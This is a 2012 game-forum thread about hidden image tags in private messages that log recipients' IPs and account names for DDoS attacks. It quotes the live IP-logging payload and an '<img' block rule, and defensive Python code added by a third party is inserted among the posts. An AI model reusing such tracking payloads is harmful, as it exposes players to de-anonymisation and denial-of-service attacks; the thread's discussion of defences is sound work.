Graal Forums

Graal Forums (https://forums.graalonline.com/forums/index.php)
-   PlayerWorlds Main Forum (https://forums.graalonline.com/forums/forumdisplay.php?f=15)
-   -   Empty PMs linked to hacking incident. (https://forums.graalonline.com/forums/showthread.php?t=134266472)

Emera 05-18-2012 12:05 AM

Empty PMs linked to hacking incident.
 
Players on UN have been receiving empty PMs from various different players. We've done some snooping and found that the PMs aren't actually empty, and contain the following HTML code.

<img src="http://surgecraft.org/log.php?a=#a&b=.jpg>

The fact that the php file is named log isn't very comforting. I don't actually know how to tackle the issue other than not opening your PMs for the time being, which isn't very practical X_X

Crono 05-18-2012 12:12 AM

Yeah he DCed my net, at least he said sorry afterwards though.

Emera 05-18-2012 12:13 AM

:3 This is getting slightly out of hand all of this hacking nonsense.

fowlplay4 05-18-2012 12:20 AM

Append to wordfilter/rules.txt

Code:

RULE
CHECK pm
MATCH 
<img
PRECISION 100
%
WORDPOSITION part
ACTION replace
RULEEND 


Bell 05-18-2012 12:22 AM

I emailed Stefan about it so that maybe he can help with a permanent fix. I agree it's extremely annoying.

I swear I used to be able to disable images in PMs in an option but it doesn't seem to be there anymore.

callimuc 05-18-2012 12:27 AM

Quote:

Originally Posted by Emera (Post 1694954)
<img src="http://surgecraft.org/log.php?a=#a&b=.jpg>

If it's the same code you posted, then I'm wondering how many PMs the "hacker" will have to send until he does realize that there is a " missing at the end.

Rave_J 05-18-2012 12:43 AM

Quote:

Originally Posted by callimuc (Post 1694960)
If it's the same code you posted, then I'm wondering how many PMs the "hacker" will have to send until he does realize that there is a " missing at the end.

lol

fowlplay4 05-18-2012 12:48 AM

Quote:

Originally Posted by Bell (Post 1694959)
I emailed Stefan about it so that maybe he can help with a permanent fix. I agree it's extremely annoying.

I swear I used to be able to disable images in PMs in an option but it doesn't seem to be there anymore.

The only way to fix this particular exploit is to have a white-list of image hosts (e.g. imgur, imageshack, or tinypic) for linking images in PMs.

Also, the filter I just posted does disable images in PMs.

Starfire2001 05-18-2012 12:52 AM

Quote:

Originally Posted by fowlplay4 (Post 1694964)
The only way to fix this particular exploit is to have a white-list of image hosts (e.g. imgur, imageshack, or tinypic) for linking images in PMs.

Also, the filter I just posted does disable images in PMs.

Thanks, added it. It works on server PMs but doesn't disable images from global PMs. Any way I could do that?

ffcmike 05-18-2012 01:06 AM

Kevin and I discovered this weeks ago; I thought it was common knowledge due to some incidents on UN which PWA dealt with.

Bell 05-18-2012 04:59 PM

Stefan contacted me and put a filter in for it and is going to see if he can resolve the issue within the client but could not get it to crash the v6 client at all. Are any of you who actually have the problem using v6? He suggests everyone update their version.

Emera 05-18-2012 05:05 PM

Fantastic, thank you.

fowlplay4 05-18-2012 05:05 PM

Quote:

Originally Posted by Bell (Post 1695003)
Stefan contacted me and put a filter in for it and is going to see if he can resolve the issue within the client but could not get it to crash the v6 client at all. Are any of you who actually have the problem using v6? He suggests everyone update their version.

This isn't about a crash at all; it's just linking an image and logging their IP addresses. The attacker then DDoS'd the IPs.

Bell 05-18-2012 05:07 PM

Thanks fp

Crono 05-18-2012 11:14 PM

Quote:

Originally Posted by Bell (Post 1695003)
He suggests everyone update their version.

never!! :p

Bell 05-19-2012 08:39 PM

Disabling images in PMs then is really the only other option to protect everyone. Stefan has asked and I've advised it's the best course of action unless we can re-enable the option to turn imaging on and off in PMs.

linkrulz4 05-19-2012 09:09 PM

To disable HTML in PMs the old-fashioned way, please do the following procedure:
Close Graal before doing anything.
1) Go into your Graal folder.
2) Find control2config.txt.
3) Locate the line nohtmlinpms=false.
4) Change the value to true.
5) Save and exit.
6) Start up Graal.
7) Be sure to check the txt file after Graal loads to see if it changed back or not.


Disregard this post. That's for RC.

Crow 05-19-2012 09:12 PM

Quote:

Originally Posted by linkrulz4 (Post 1695072)
To disable HTML in PMs the old-fashioned way, please do the following procedure:
Close Graal before doing anything.
1) Go into your Graal folder.
2) Find control2config.txt.
3) Locate the line nohtmlinpms=false.
4) Change the value to true.
5) Save and exit.
6) Start up Graal.
7) Be sure to check the txt file after Graal loads to see if it changed back or not.

That's the config file for RC. It does not apply to the client at all.

linkrulz4 05-19-2012 09:37 PM

Quote:

Originally Posted by Crow (Post 1695073)
That's the config file for RC. It does not apply to the client at all.

Ah, I see.

In that case, where is the command to shut this off located, perhaps?
"File download: http://pics.fort90.com/cdi_link.gif (size: 43364) done"

On a side note, putting:
nohtmlinpms=true
nohtmlimages=true
into the game_config did alter the way images were presented, just a tad. Doesn't stop them from loading, though.

Crow 05-19-2012 09:40 PM

As far as I'm aware, it's not possible to completely disable HTML in PMs anymore.

linkrulz4 05-19-2012 09:42 PM

Quote:

Originally Posted by Crow (Post 1695077)
As far as I'm aware, it's not possible to completely disable HTML in PMs anymore.

That seems rather faulty. There has to be a way, somewhere.
I swore in the old versions of the game there was an option for it. Has anyone tried applying that to the current v6?

Also, when I look in the PO gui files there seems to have been an attempt to insert a switch (at least the text for one) into the GUI to turn off html in pms.
I can't find it anywhere in the actual GUI though.

Crow 05-19-2012 09:43 PM

There was, but it's not the same anymore. Current HTML parsing is done in GS2's GUI system.

linkrulz4 05-19-2012 09:56 PM

Quote:

Originally Posted by Crow (Post 1695079)
There was, but it's not the same anymore. Current HTML parsing is done in GS2's GUI system.

Well, I'm stumped then!

skillmaster19 05-20-2012 03:55 PM

Should probably censor some of the html code so someone else doesn't start doing it too.

cbk1994 05-20-2012 04:30 PM

Quote:

Originally Posted by skillmaster19 (Post 1695117)
Should probably censor some of the html code so someone else doesn't start doing it too.

I would rather just see a whitelist of image hosts (including u.graalcenter.org !!). Message codes should be disabled as well. Stuff like "#1" is just annoying, while "#a" in HTML can be a real problem (since it lets you easily map IPs -> accounts).

Tigairius 05-20-2012 09:14 PM

I vehemently disagree with the idea of disabling displaying images in PMs. I do agree with the idea of getting rid of #a, etc. though.

Having HTML and allowing images to be displayed opens up so much customization in PMs for players. I see players using it all the time to advertise items they're selling on Era and other servers by showing the item's icon and stuff.

Players could possibly have the option to disable the <img> tag linking to external sources maybe (that would mean if you tried to display an image that exists on the server it would still work, so players could link to item icons, etc), but leave HTML alone.

I do not want to see images being removed from PMs though.

Crono 05-20-2012 09:30 PM

Era must have some creative folk because I've never seen it used on Zodiac or Era. I like Chris' whitelist idea.

cbk1994 05-20-2012 10:03 PM

Quote:

Originally Posted by Crono (Post 1695159)
Era must have some creative folk because I've never seen it used on Zodiac or Era. I like Chris' whitelist idea.

It is used a lot in masses. Mostly I find it annoying, but I too wouldn't like to see it disabled entirely. 6,436 uses in masses since September 2011. Stuff like...

http://i294.photobucket.com/albums/m...ds/Ad37-19.png

http://i1206.photobucket.com/albums/...8/DairyHut.png

http://i1141.photobucket.com/albums/...mapImage-1.png

(just a few off the top)

Hezzy002 05-20-2012 11:44 PM

The solution is obviously to download images to the game server as a proxy and then send them to the client.

Crow 05-20-2012 11:56 PM

Quote:

Originally Posted by Hezzy002 (Post 1695169)
The solution is obviously to download images to the game server as a proxy and then send them to the client.

Indeed. It's the only logical approach to this problem.
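Hezzy002 and Crow describe a server-side image proxy: the game server fetches the image and relays it, so the player's client never connects to the external host and its IP cannot be logged there. The following Python is an added example written for this thread, not code from Graal or from any poster. It sketches the checks such a proxy should make before relaying a response: only http(s) URLs, only hosts that resolve to a public address (so the proxy cannot be aimed at the server's own network), a size cap, and only bodies that begin with a known image signature, which is what stops a script that merely ends in ".jpg" from being served. The URLs, DNS entries, image bytes, size cap, and the function names `proxy_image` and `check` are all constructed or hypothetical.

```python
import ipaddress
import socket
from urllib.parse import urlsplit
from urllib.request import urlopen

# Magic bytes of the formats the proxy will relay; anything else (HTML, PHP
# output, a redirect page) is refused even if the URL ends in ".jpg".
IMAGE_SIGNATURES = (
    (b"\x89PNG\r\n\x1a\n", "image/png"),
    (b"GIF87a", "image/gif"),
    (b"GIF89a", "image/gif"),
    (b"\xff\xd8\xff", "image/jpeg"),
)
MAX_IMAGE_BYTES = 512 * 1024  # hypothetical size cap


def sniff_image_type(data):
    """Return a MIME type if data starts with a known image signature, else None."""
    for signature, mime in IMAGE_SIGNATURES:
        if data.startswith(signature):
            return mime
    return None


def is_public_address(host, resolver=socket.gethostbyname):
    """Refuse hosts that resolve to loopback, private or other non-global ranges,
    so the proxy cannot be pointed at the game server's own network."""
    try:
        ip = ipaddress.ip_address(resolver(host))
    except (OSError, ValueError, KeyError):
        return False
    return ip.is_global


def http_fetch(url, limit):
    """Default fetcher for real use: read at most `limit` bytes of the body."""
    with urlopen(url, timeout=5) as resp:
        return resp.read(limit)


def proxy_image(url, fetch=http_fetch, resolver=socket.gethostbyname):
    """Fetch url on the server's behalf and return (mime, data) only if it is
    safe to relay to a client; raise ValueError with the reason otherwise."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):
        raise ValueError("unsupported scheme")
    host = (parts.hostname or "").lower()
    if not host:
        raise ValueError("missing host")
    if not is_public_address(host, resolver):
        raise ValueError("host does not resolve to a public address")
    data = fetch(url, MAX_IMAGE_BYTES + 1)   # read one extra byte to detect overflow
    if len(data) > MAX_IMAGE_BYTES:
        raise ValueError("image too large")
    mime = sniff_image_type(data)
    if mime is None:
        raise ValueError("response is not an image")
    return mime, data


# --- constructed stand-ins so the example runs offline ---------------------
PNG_SAMPLE = b"\x89PNG\r\n\x1a\n" + b"\x00" * 32   # fake PNG body (constructed)
FAKE_RESPONSES = {
    "http://cdn.example/item.png": PNG_SAMPLE,
    "http://cdn.example/log.php?b=.jpg": b"<html>not an image</html>",
}
FAKE_DNS = {"cdn.example": "93.184.216.34", "intranet.local": "10.0.0.5"}


def fake_fetch(url, limit):
    return FAKE_RESPONSES[url][:limit]


def fake_resolver(host):
    return FAKE_DNS[host]


def check(url):
    """Run proxy_image with the fakes; return the MIME type or the refusal reason."""
    try:
        return proxy_image(url, fake_fetch, fake_resolver)[0]
    except ValueError as exc:
        return "refused: %s" % exc


if __name__ == "__main__":
    for u in FAKE_RESPONSES:
        print(u, "->", check(u))
    print("http://intranet.local/x.png", "->", check("http://intranet.local/x.png"))
```

This check is only a sketch of the proxy's gatekeeping; a deployable version would additionally connect to the address it just validated rather than resolving the name a second time, and would combine the signature check with the host white-list discussed earlier in the thread.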

Fulg0reSama 05-20-2012 11:57 PM

Some of these are more diverting my attention away than towards their advertisements.

Crono 05-21-2012 05:29 AM

Quote:

Originally Posted by cbk1994 (Post 1695161)
It is used a lot in masses. Mostly I find it annoying, but I too wouldn't like to see it disabled entirely. 6,436 uses in masses since September 2011. Stuff like...

Like I said, Era folk must be creative because it's never seen on Zod or UN.

Crono 05-21-2012 06:17 AM

Being the kind person I am, I casually contacted the person doing this and he said that he has ceased the attacks.

Bell 05-21-2012 06:03 PM

Quote:

Originally Posted by Tigairius (Post 1695158)

I do not want to see images being removed from PMs though.

Putting it in bold certainly lets us know your opinion of it, lol. I don't like the idea of having to remove images either but this has become a serious problem with Graalians from all servers affected. Yes, some servers have put in filters and yes, Stefan has added key words to the main filters but we all know that only lasts so long.

Personally my first choice is to make imaging an option again, then you could add all the filters you wanted but at least you would have the option of shutting them off until such time as a new filter could be added. That option is up to Stefan though, I don't and didn't know if it's a possible solution to the problem. Hopefully it is.

DustyPorViva 05-21-2012 06:32 PM

Disable php format from being used as an image?

Fulg0reSama 05-21-2012 06:32 PM

Quote:

Originally Posted by DustyPorViva (Post 1695210)
Disable php format from being used as an image?

I like this idea personally.

nightslayer317 05-21-2012 06:35 PM

Quote:

Originally Posted by Bell (Post 1695208)
Putting it in bold certainly lets us know your opinion of it, lol. I don't like the idea of having to remove images either but this has become a serious problem with Graalians from all servers affected. Yes, some servers have put in filters and yes, Stefan has added key words to the main filters but we all know that only lasts so long.

Personally my first choice is to make imaging an option again, then you could add all the filters you wanted but at least you would have the option of shutting them off until such time as a new filter could be added. That option is up to Stefan though, I don't and didn't know if it's a possible solution to the problem. Hopefully it is.

I hope he fully disables HTML. Many times players have reported pornographic and visually disturbing images PMed to them via mass or private message. The item selling ads are creative and fun but the images of men or females bending over and exposing themselves are not suitable or relevant to the game. At least I don't think they are.

DustyPorViva 05-21-2012 06:43 PM

Quote:

Originally Posted by nightslayer317 (Post 1695212)
I hope he fully disables HTML. Many times players have reported pornographic and visually disturbing images PMed to them via mass or private message. The item selling ads are creative and fun but the images of men or females bending over and exposing themselves are not suitable or relevant to the game. At least I don't think they are.

Welcome to the internet, where **** happens.

Fulg0reSama 05-21-2012 06:45 PM

Quote:

Originally Posted by DustyPorViva (Post 1695213)
Welcome to the internet, where **** happens.

If only I hadn't given rep yesterday :C

fowlplay4 05-21-2012 06:45 PM

Quote:

Originally Posted by DustyPorViva (Post 1695210)
Disable php format from being used as an image?

It's not that simple; you can log image requests in general, e.g. in Rails:

Started GET "/test_fowlplay4.png" for 127.0.0.1 at 2012-05-21 09:43:46 -0700

I still think the best option will be a white-list of approved image hosts, and then a player-list option to disable the rendering of external images in PMs.

Unless Stefan can script it into the PM system we'll likely need a client update (we're way overdue already).
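fowlplay4 (here and earlier) and cbk1994 argue for a white-list of image hosts plus removal of message codes such as "#a", since a code expanded into an image URL is what lets a remote log map IPs to accounts. The following Python is an added example written for this thread, not code from Graal, its wordfilter, or any poster. It rebuilds a PM body keeping only plain text, a few harmless tags, and `<img>` tags whose source is an http(s) URL on an allow-listed host with no message code in it; everything else is dropped and the refused image URLs are returned so a server can log them. The host list, the `SAFE_TAGS` set, the simplified message-code pattern, and the names `sanitize_pm` and `image_src_allowed` are assumptions made for the example.

```python
import html
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Constructed allow-list, not Graal's: the hosts named in the thread plus
# u.graalcenter.org, which cbk1994 asked for.
ALLOWED_IMAGE_HOSTS = frozenset({
    "i.imgur.com", "imgur.com", "imageshack.us", "tinypic.com", "u.graalcenter.org",
})

# Simplified stand-in for Graal message codes such as "#a" (account name):
# any "#" followed by a letter or digit counts as a code, so the viewer's
# account name can never be expanded into a URL the client then fetches.
# Image URLs have no legitimate need for a fragment, so this is deliberately strict.
MESSAGE_CODE = re.compile(r"#[A-Za-z0-9]")

SAFE_TAGS = frozenset({"b", "i", "u", "br"})   # hypothetical: formatting kept as-is


def image_src_allowed(src, allowed_hosts=ALLOWED_IMAGE_HOSTS):
    """True only for an http(s) URL on an allow-listed host with no message code."""
    if MESSAGE_CODE.search(src):
        return False
    parts = urlsplit(src)
    if parts.scheme not in ("http", "https"):
        return False
    host = (parts.hostname or "").lower()
    return host in allowed_hosts


class PMSanitizer(HTMLParser):
    """Rebuilds a PM keeping only SAFE_TAGS, text, and allow-listed <img> tags."""

    def __init__(self, allowed_hosts):
        super().__init__(convert_charrefs=True)
        self.allowed_hosts = allowed_hosts
        self.out = []       # rebuilt HTML fragments
        self.dropped = []   # image URLs that were refused, for logging

    def handle_starttag(self, tag, attrs):
        if tag == "img":
            src = dict(attrs).get("src") or ""
            if image_src_allowed(src, self.allowed_hosts):
                self.out.append('<img src="%s">' % html.escape(src, quote=True))
            else:
                self.dropped.append(src)
        elif tag in SAFE_TAGS:
            self.out.append("<%s>" % tag)
        # every other tag (a, script, iframe, style, ...) is silently discarded

    def handle_endtag(self, tag):
        if tag in SAFE_TAGS:
            self.out.append("</%s>" % tag)

    def handle_data(self, data):
        self.out.append(html.escape(data, quote=False))


def sanitize_pm(text, allowed_hosts=ALLOWED_IMAGE_HOSTS):
    """Return (clean_html, dropped_image_urls) for one PM body."""
    parser = PMSanitizer(allowed_hosts)
    parser.feed(text)
    parser.close()
    return "".join(parser.out), list(parser.dropped)


if __name__ == "__main__":
    # The thread's payload, with the closing quote callimuc noted was missing.
    hostile = '<img src="http://surgecraft.org/log.php?a=#a&b=.jpg">'
    print(sanitize_pm(hostile))
    print(sanitize_pm('<b>Selling</b> <img src="http://i.imgur.com/abc.png"> pm me'))
```

Run against the thread's own payload (with the closing quote added), the image is dropped and its URL is returned for logging, while an item advert of the kind Tigairius and cbk1994 describe passes through untouched as long as it is hosted on an allow-listed site. Applying this on the server before a PM is delivered removes the dependency on a client update that fowlplay4 mentions, though a per-player option to drop all external images on top of it remains worthwhile.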

